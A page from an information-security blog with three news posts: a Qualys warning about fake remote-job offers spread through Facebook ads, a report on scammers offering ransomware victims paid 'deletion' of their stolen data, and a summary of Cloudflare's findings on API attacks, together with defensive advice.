Researchers from Qualys are warning of “ongoing attacks against multiple brands” offering remote work through Facebook ads that go so far as to send what look like legitimate work contracts to victims, according to a blog post published Jan. 10 by Jonathan Trull, Qualys CISO and senior vice president of solutions architecture.
The attackers dangle offers of work-at-home opportunities to lure Facebook users to install or move to a popular chat app with someone impersonating a legitimate recruiter to continue the conversation. Eventually, attackers ask for personal information and credentials that potentially can allow attackers to defraud them in the future.
Likely aiming to take advantage of people’s tendency to make resolutions in the new year, these fake job ads — a persistent online threat — typically “see a rise in prevalence following the holidays” when people are primed for new opportunities, Trull wrote.
Qualys Caught Up in Scam
The researchers discovered the scams because fake recruiters were purporting to be from Qualys with offers of remote work. The company, however, never posts its job listings on social media, only on its own website and reputable employment sites, Trull said.
The initial text lures for the scam occur in group chats that solicit users to move to private messaging with the scammer who posts the job opening. “In several cases, the scammer appears to have compromised legitimate Facebook users and then targeted their direct connections,” Trull wrote.
Once a victim installs Go Chat or Signal — the messaging apps used in the scam — attackers ask for additional details so they can receive and sign what appears to be an official Qualys job offer complete with logos, correct corporate addresses, and signature lines.
Attackers then ask victims to send a copy of a government-issued photo ID, both front and back, and told to digitally cash a check to buy software for a new computer that their new employer will ship to them.
Qualys has notified both Facebook and law enforcement of the scam and encourages users to do the same if they observe it on the platform. The blog post did not list the names of other companies or brands that might also be targeted in the attacks.
Avoid Being Scammed
Job scams are indeed a constant online security issue, one that’s on the rise, according to the US Better Business Bureau (BBB). Online ads and phishing campaigns are popular conduits for job scammers, which use social engineering to bait people into responding and then either steal their personal data, online credentials, and/or money. Scams also can have a negative reputational impact on the companies whose brands are used in the scam.
To avoid being scammed by a fake job listing, Qualys provided some best practices for online employment seekers to follow when using the Internet to search for opportunities.
In general, a mindset of “if it’s too good to be true, it probably is” is a good rule of thumb to approaching online job listings, Trull wrote. “Listen to your intuition,” he added. “If it doesn’t feel right, you should probably not proceed.”
Qualys also advised that people always verify offers by looking up a job opening on an organization’s official website and contacting the company directly instead of using social media contacts that could be abused as part of a scam.
People also should be “highly skeptical” of any job solicitation that doesn’t come from an official source, even if the social media source making the offer appears trusted. Since social media accounts can be hijacked, the source can appear legitimate but isn’t.
Further, if an online recruiter asks a person to install an app to apply for a position, it’s probably a scam, Trull warned. “Real recruiters will call you, email, or set up a multimedia interview call at their expense without any concern — they are set up for it if they are a recruiter,” he wrote.
FAKE: Fake Money
InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory
Jan 11 2024
INSIDE THE SCAM: HOW RANSOMWARE GANGS FOOL YOU WITH DATA DELETION LIES!
Recently, there has been an emergence of a new scam targeting victims of ransomware attacks. This scam involves individuals or groups posing as “security researchers” or “ethical hackers,” offering to delete data stolen by ransomware attackers for a fee. The scam plays on the fears and vulnerabilities of organizations already compromised by ransomware attacks, such as those by the Royal and Akira ransomware gangs.
The modus operandi of these scammers is quite consistent and alarming. They approach organizations that have already been victimized by ransomware and offer a service to hack into the servers of the ransomware groups and delete the stolen data. This proposition typically comes with a significant fee, sometimes in the range of 1-5 Bitcoins (which could amount to about $190,000 to $220,000).
These scammers often use platforms like Tox Chat to communicate with their targets and may go by names like “Ethical Side Group” or use monikers such as “xanonymoux.” They tend to provide “proof” of access to the stolen data, which they claim is still on the attacker’s servers. In some instances, they accurately report the amount of data exfiltrated, giving their claims an air of credibility.
A notable aspect of this scam is that it adds an additional layer of extortion to the victims of ransomware. Not only do these victims have to contend with the initial ransomware attack and the associated costs, but they are also faced with the prospect of paying yet another party to ensure the safety of their data. This situation highlights the complexities and evolving nature of cyber threats, particularly in the context of ransomware.
Security experts and researchers, like those from Arctic Wolf, have observed and reported on these incidents, noting the similarities in the tactics and communication styles used by the scammers in different cases. However, there remains a great deal of uncertainty regarding the actual ability of these scammers to delete the stolen data, and their true intentions.
THE EMERGING SCAM IN RANSOMWARE ATTACKS
1. THE FALSE PROMISE OF DATA DELETION
- Ransomware gangs have been known not to always delete stolen data even after receiving payment. Victims are often misled into believing that paying the ransom will result in the deletion of their stolen data. However, there have been numerous instances where this has not been the case, leading to further exploitation.
2. FAKE ‘SECURITY RESEARCHER’ SCAMS
- A new scam involves individuals posing as security researchers, offering services to recover or delete exfiltrated data for a fee. These scammers target ransomware victims, often demanding payment in Bitcoin. This tactic adds another layer of deception and financial loss for the victims.
3. THE HACK-BACK OFFERS
- Ransomware victims are now being targeted by fake hack-back offers. These offers promise to delete stolen victim data but are essentially scams designed to extort more money from the victims. This trend highlights the evolving nature of cyber threats and the need for greater awareness.
4. THE ILLOGICAL NATURE OF PAYING FOR DATA DELETION
- Paying to delete stolen data is considered an illogical and ineffective strategy. Once data is stolen, there is no guarantee that the cybercriminals will honor their word. The article argues that paying the ransom often leads to more harm than good.
5. THE ROLE OF RANSOMWARE GROUPS
- Some ransomware groups are involved in offering services to delete exfiltrated data for a fee. However, these offers are often scams, and there is no assurance that the data will be deleted after payment.
These scams underscores the critical importance of cybersecurity vigilance and the need for robust security measures to protect against ransomware and related cyber threats. It also highlights the challenging decision-making process for organizations that fall victim to ransomware: whether to pay the ransom, how to handle stolen data, and how to respond to subsequent extortion attempts.
The Ransomware Hunting Team: A Band of Misfits’ Improbable Crusade to Save the World from Cybercrime
InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory
Jan 11 2024
APIs are increasingly becoming attractive targets
APIs power the digital world—our phones, smartwatches, banking systems and shopping sites all rely on APIs to communicate. They can help ecommerce sites accept payments, enable healthcare systems to securely share patient data, and even give taxis and public transportation access to real-time traffic data.
Nearly every business today now uses them to build and provide better sites, apps and services to consumers. However, if unmanaged or unsecured, APIs present a goldmine for threat actors to exfiltrate potentially sensitive information.
“APIs are central to how applications and websites work, which makes them a rich, and relatively new, target for hackers,” said Matthew Prince, CEO at Cloudflare. “It’s vital that companies identify and protect all their APIs to prevent data breaches and secure their businesses.”
APIs popularity boosts attack volume
The seamless integrations that APIs allow for have driven organizations across industries to increasingly leverage them – some more quickly than others. The IoT, rail, bus and taxi, legal services, multimedia and games, and logistics and supply chain industries saw the highest share of API traffic in 2023.
APIs dominate dynamic Internet traffic around the globe (57%), with each region that Cloudflare protects seeing an increase in usage over the past year. However, the top regions that explosively adopted APIs and witnessed the highest traffic share in 2023 were Africa and Asia.
As with any popular business critical function that houses sensitive data, threat actors attempt to exploit any means necessary to gain access. The rise in popularity of APIs has also caused a rise in attack volume, with HTTP Anomaly, Injection attacks and file inclusion being the top three most commonly used attack types mitigated by Cloudflare.
Shadow APIs provide a defenseless path for threat actors
Organizations struggle to protect what they cannot see. Nearly 31% more API REST endpoints (when an API connects with the software program) were discovered through machine learning versus customer-provided identifiers – e.g., organizations lack a full inventory of their APIs.
Regardless if an organization has full visibility of all their APIs, DDoS mitigation solutions can help block potential threats. 33% of all mitigations applied to API threats were blocked by DDoS protections already in place.
“APIs are powerful tools for developers to create full-featured, complex applications to serve their customers, partners, and employees, but each API is a potential attack surface that needs to be secured,” said Melinda Marks, Practice Director, Cybersecurity, for Enterprise Strategy Group. “As this new report shows, organizations need more effective ways to address API security, including better visibility of APIs, ways to ensure secure authentication and authorization between connections, and better ways to protect their applications from attacks.”
InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory
« Previous Page — Next Page »
